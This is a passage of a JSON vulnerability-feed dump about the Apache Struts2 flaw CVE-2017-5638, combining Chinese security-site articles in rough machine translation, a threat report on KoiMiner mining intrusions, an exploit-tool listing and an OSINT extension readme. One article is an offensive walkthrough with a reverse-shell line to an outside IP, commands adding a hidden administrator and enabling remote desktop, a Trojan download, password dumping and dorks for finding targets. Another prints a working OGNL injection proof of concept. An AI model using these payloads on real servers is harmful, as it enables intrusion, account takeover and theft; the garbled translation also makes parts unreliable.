vulnerabilities were classified, and then promptly will be the presence of vulnerabilities the application offline to fix this issue, a few days later I received a Yahoo to provide me with the 5500 knife vulnerability bonus. \nIn fact, digging a hole is not difficult, as long as you are willing to spend time, willing to move the brain to think, I believe thousands of dollars of vulnerability bonuses to everyone or can be easily in the bag. Finally, I hope my these little can be found to everyone in the burrow in the process bring some inspiration. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Burrow experience | to see how I find the Yahoo remote code execution vulnerability and get the 5500 knife bonus-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-10T13:31:12", "description": "0\u00d71 Overview \nMany business websites use the Apache open source project to build a http server, which is most of the use of the Apache sub-project of Struts in. But since the Apache Struts2 Product code there are more risks, beginning in 2007, Struts2 will frequently broke multiple high-risk vulnerabilities. \nFrom the Apache official data, from 2007 to 2018 total published number S2-001 to S2-056 total of 56 vulnerabilities, of which only a remote code execution vulnerability Remote Code Execution on a 9. \n! [](/Article/UploadPic/2018-7/2018710164555841. png? www. myhack58. com) \n2017 3 months was reported out of the S2-045\uff08CVE-2017-5638 high-risk vulnerabilities, based on Jakarta Multipart parser implementation file upload may lead to an RCE, the impact of the range of the Struts 2.3.5 \u2013 Struts 2.3.31, as well as the Struts 2.5 \u2013 Struts 2.5.10 version, persists to be utilized for an attack. \n2018 year 4 months Tencent Yu see Threat Intelligence Center had been monitoring the hacker group exploit this vulnerability bulk of the invasion[the web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)implantation mining Trojan\uff08for more details, see the enterprise not fix Apache Struts 2 vulnerability-induced[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)is the bulk of the invasion article, the recent Royal to see the Threat Intelligence Center is again monitored a similar attack. \nThis attack, hackers use attack tools WinStr045 detecting the presence on the network vulnerability[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), found that the presence of vulnerability of the machine through a remote execution of various types of instruction provide the right to, create, account, system information gathering, and then will be used to download the Trojan mas. exe the implant, then the use of mas. exe this Trojan Downloader from the plurality of C&C;address to download more Trojans: the \u5229\u7528\u63d0\u6743\u6728\u9a6co3/o6.exe and \u6316\u77ff\u6728\u9a6cnetxmr4.0.exe the. \nSince the bitcoin mining Trojan netxmr the decryption code after the module name\u201ckoi\u201dis loaded, therefore, Tencent Yu see Threat Intelligence Center will be named for KoiMiner it. Interestingly, intruders to ensure your mining success, it will check the system processes, CPU resource consumption, and if CPU usage exceeds 40%, it will be the end of the Run, will save the system resources for the mining of. \nAccording to the code traceability analysis, Tencent Yu see Threat Intelligence Center researchers believe that this KoiMiner series mining Trojan is probably some hacker forums, underground mining organizations to share in the community more people cooperation of the\u201cpractice\u201dworks. \n! [](/Article/UploadPic/2018-7/2018710164555994. png? www. myhack58. com) \nAttack process \nNote: Struts is based on MVC design pattern Web application framework, the user use of the framework can be business logic code from the presentation layer clearly separated, so as to focus on the business logic and the mapping relationship between the configuration file. Struts2 is Struts and WebWork combination, a combination of Struts and WebWork advantages, the use of interceptor mechanisms to process the user's request, so that business logic can with ServletAPI completely out of the opening. \n0\u00d72 a detailed analysis of the \n0 x 2.1 intrusion \nThe detection of the target system whether the presence of S2-045 vulnerability \n! [](/Article/UploadPic/2018-7/2018710164555176. png? www. myhack58. com) \nThe presence of the vulnerability of the system to attack \n! [](/Article/UploadPic/2018-7/2018710164555748. png? www. myhack58. com) \nInvasion tool for the selection of osmotic command \n! [](/Article/UploadPic/2018-7/2018710164555749. png? www. myhack58. com) \nThe invasion can be selected when execution of the command can also be self-defined,choose the command Windows, linux, penetration of commonly used commands, including viewing system version information, network connection status, port open status and add to the system with administrator privileges to the new user, open the remote connection service and other operations. \n! [](/Article/UploadPic/2018-7/2018710164555928. png? www. myhack58. com) \nThrough the directory view command to confirm C:\\Windows\\Help directory and C:\\ProgramData whether the directory has been implanted Trojan, if not then the mas. exe Trojan infection. The time of implantation to first create the C#code to text mas. cs, \u7136\u540e\u4f7f\u7528.NET\u7a0b\u5e8f\u5c06\u5176\u7f16\u8bd1\u4e3a\u53ef\u6267\u884c\u6587\u4ef6mas.exe the. \nFirst execute the command to create a mas. cs and write The for download code. \n! [](/Article/UploadPic/2018-7/2018710164555437. png? www. myhack58. com) \n\u7136\u540e\u6267\u884c\u547d\u4ee4\u5c06mas.cs\u901a\u8fc7.NET\u7a0b\u5e8f\u7f16\u8bd1\u4e3amas.exe the. \n! [](/Article/UploadPic/2018-7/2018710164555672. png? www. myhack58. com) \nCommand in the use of mas. exe download mining Trojan netxmr4. To 0. \n! [](/Article/UploadPic/2018-7/2018710164555433. png? www. myhack58. com) \nPart of the attack objectives are as follows: \n! [](/Article/UploadPic/2018-7/2018710164555651. jpg? www. myhack58. com) \nImplantation of mas. the exe size is only 4k,is stored in the directory ProgramData. From Yu see Threat Intelligence Center monitoring and recording can be seen, mas.exe\u4ece\u591a\u4e2aC2\u5730\u5740\u4e0b\u8f7d\u4e86netxmr4.exe(mining Trojan), the o3.exe/o6.exe(providing the right to Trojans)and other Trojans. \n! [](/Article/UploadPic/2018-7/2018710164555713. png? www. myhack58. com)\n\n**[1] [[2]](<90758_2.htm>) [[3]](<90758_3.htm>) [[4]](<90758_4.htm>) [next](<90758_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-07-10T00:00:00", "type": "myhack58", "title": "Apache Struts2 high-risk vulnerabilities cause the Enterprise Server is the invasion mounted KoiMiner mining Trojan-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-07-10T00:00:00", "id": "MYHACK58:62201890758", "href": "http://www.myhack58.com/Article/html/3/62/2018/90758.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-08T11:52:28", "description": "1.1 CVE-2017-5638 vulnerability profile\nApache Struts 2 is the world's most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10 \nVulnerability ID: CVE-2017-5638 \nVulnerability rating: HIGH \nVulnerability name: S2-045: Struts 2 remote code execution vulnerability\nVulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE \nAffected version: Struts 2.3.5-Struts 2.3.31 \nThe Struts 2.5-Struts 2.5.10 \nRepair solutions: \nUpgrade to Struts2. 3. 32 or the Struts 2.5.10.1 \nStruts2. 3. 32 download address: \nhttps://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 \nStruts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 \nThe vulnerability principle: Struts2 default parse the uploaded file's Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code. \n1.2 hazard assessment\nAfter the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night. \n1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work\n1\uff0e Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download. \n2\uff0e Ready to have a separate IP of the server, \u5728\u4e0a\u9762\u6709nc.exe the. \n3\uff0e Prepare python environment. \nGeneral use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the \u7136\u540e \u5230 \u8be5 \u76ee\u5f55 \u6267\u884c pythonsetup.py install, to install. Note that in python if you do not set system variables, you'll need to strip the full path to execute. For example: \nC:\\Python27\\python.exeC:\\Python27\\poster-0.8.1\\setup.py install \n! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com) \nFigure 1 The Missing poster. the encode module \n4\uff0e Get a variety of action page \n\uff081\uff09by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like. \n\uff082\uff09Baidu aunt law\ninurl:index. actionsite:edu. cn \ninurl:index. actionsite:gov. cn \ninurl:index. actionsite:com. cn \nNote: don't vandalize, and now the network security method very good it!!! \n1.3.2 modify the poc exploit code\n1. For the linux version of the modified whoami values: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1 \nDescription of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the \u7136\u540e \u5c06 \u6587\u4ef6 \u4fdd\u5b58 \u4e3a poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name. \n! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com) \nFigure 2 modify the linux poc exploit code\n2. Corresponding Windows Server, modify the whomai value: \nnet user antian365$ Wsantian365!*/ add \nnet localgroup administratorsantian365$ /add \n\u5206\u522b \u5c06 poc \u6587\u4ef6 \u4fdd\u5b58 \u4e3a pocwin1.py and pocwin2.py as shown in Figure 3. \n! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com) \nFigure 3 modify the windows under the use of the code\n1.3.3 under Windows fast implement penetration\n1. Each other to open up 3389 \n\uff081\uff09scanning each other whether to open the 3389, open a, respectively, to execute: \npocwin1.py http://www.myhack58.com/index.action \npocwin2.py http://www.myhack58.com/index.action \nIf the other loopholes, then it will directly add a user\u201cantian365$\u201d, password\u201cWsantian365!*\u201d, the Server to open the 3389, sign up and then download wce64, directly wce64 \u2013w to get the current login password, be sure to use administrator rights to execute. \n\uff082\uff09directly on 3389 \nIn the parameters were modified three times, execute the following code three times, you can open 3389. \nwmic /namespace:\\\\\\root\\cimv2\\terminalservices pathwin32_terminalservicesetting where (__CLASS != \"\") callsetallowtsconnections 1 \nwmic/namespace:\\\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 \nreg add\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f \n3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method. \n2. The Trojan executes the law\n\uff081\uff09Download the Trojan\nFirst you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters: \nGermany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\\windows\\temp\\ma.exe \nma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\\windows\\temp directory. \n\uff082\uff09the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation. \nc:\\windows\\temp\\ma.exe \n1.3. 4Linux under the rapid penetration of the ideas\n1. On a standalone server to perform monitoring, required in the independent IP on the server, execute\u201cnc \u2013vv\u2013l \u2013p 4433\u201d, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules. \n2. Perform poc \n\n\n**[1] [[2]](<84086_2.htm>) [[3]](<84086_3.htm>) [next](<84086_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T00:00:00", "type": "myhack58", "title": "How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-08T00:00:00", "id": "MYHACK58:62201784086", "href": "http://www.myhack58.com/Article/html/3/62/2017/84086.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-07T09:25:04", "description": "! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) \nFreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nThe Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. \nIn fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. \nThe scope of the impact\nThe Struts 2.3.5 \u2013 Struts 2.3.31 \nThe Struts 2.5 \u2013 Struts 2.5.10 \nSolution\nIf you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. \nVulnerability PoC \n#! /usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster. encode import multipart_encode \nfrom poster. streaminghttp import register_openers \nheader1 ={ \n\"Host\":\"alumnus. shu. edu. cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus. shu. edu. cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \nregister_openers() \ndatagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \nheader[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \nheader[\"Content-Type\"]=\"'%{(#nike,='multipart/form-data'). \n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). \n(#_memberAccess? (#_memberAccess=#dm): \n((#container=#context['com. opensymphony. xwork2. ActionContext. container']). \n(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). \n(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). \n(#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). \n(#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). \n(#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). \n(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). \n(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). \ngetOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). \n(#ros. flush())}\"' \nrequest = urllib2. Request(str(sys. argv[1]),datagen,headers=header) \nresponse = urllib2. urlopen(request) \nprint the response. read() \n\npoc() \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784026", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2023-06-02T16:27:59", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T15:04:37", "description": "[](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [OSINT](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract & refang IoC from a selected block of text. \n * E.g. `example[.]com` to `example.com`, `test[at]example.com` to `some-email@example.com`, `hxxp://example.com` to `http://example.com`, etc.\n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc.\n \n**Features** \n \n**Supported IOC types** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | `8.8.8.8` \ndomain | Domain name | `github.com` \nurl | URL | `https://github.com` \nemail | Email address | `some-email@example.com` \nasn | ASN | `AS13335` \nhash | md5 / sha1 / sha256 | `44d88612fea8a8f36de82e1278abb02f` \ncve | CVE number | `CVE-2018-11776` \nbtc | BTC address | `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` \ngaPubID | Google Adsense Publisher ID | `pub-9383614236930773` \ngaTrackID | Google [Analytics](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | `UA-67609351-1` \n \n**Supported search engines** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [https://www.abuseipdb.com](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [https://archive.org](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [http://archive.fo](<http://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [https://bgpview.io](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [https://app.binaryedge.io](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [https://www.bitcoinabuse.com](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc \nBlockchain.com | [https://www.blockchain.com](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [https://live.blockcypher.com](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [https://censys.io](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [https://crt.sh](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [https://dnslytics.com](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [https://domainbigdata.com](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [https://www.domaintools.com](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [https://domainwat.ch](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [https://emailrep.io](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [https://findsubdomains.com](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [https://fofa.so](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [https://fortiguard.com](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [https://transparencyreport.google.com](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [https://viz.greynoise.io](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [https://hashdd.com](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [https://www.hybrid-analysis.com](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [https://intelx.io](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [https://ipinfo.io](<https://ipinfo.io/> \"https://ipinfo.io\" ) | ip / asn \nIPIP | [https://en.ipip.net](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [https://www.joesandbox.com](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [https://malshare.com](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [https://www.maltiverse.com](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [https://nvd.nist.gov](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [https://data.occrp.org](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [https://www.onyphe.io](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [https://otx.alienvault.com](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [http://pub-db.com](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [https://publicwww.com](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [https://pulsedive.com](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [http://community.riskiq.com](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [https://securitytrails.com](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [https://www.shodan.io](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [https://sploitus.com](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [http://spyonweb.com](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [https://talosintelligence.com](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [https://app.threatconnect.com](<https://app.threatconnect.com/> \"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [https://www.threatcrowd.org](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [https://www.threatminer.org](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [https://threatintelligenceplatform.com](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [https://viewdns.info](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [https://vulmon.com](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [https://www.vulncode-db.com](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [http://vxcube.com](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [https://wa-com.com](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [https://weleakinfo.com](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [https://exchange.xforce.ibmcloud.com](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [https://www.zoomeye.org](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n**Supported scan engines** \nname | url | supported types \n---|---|--- \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n**Downloads** \n\n\n * Chrome: <https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg>\n * FireFox: <https://addons.mozilla.org/en-US/firefox/addon/mitaka/>\n \n**How to use** \nThis browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on. \n \n**Examples:** \n 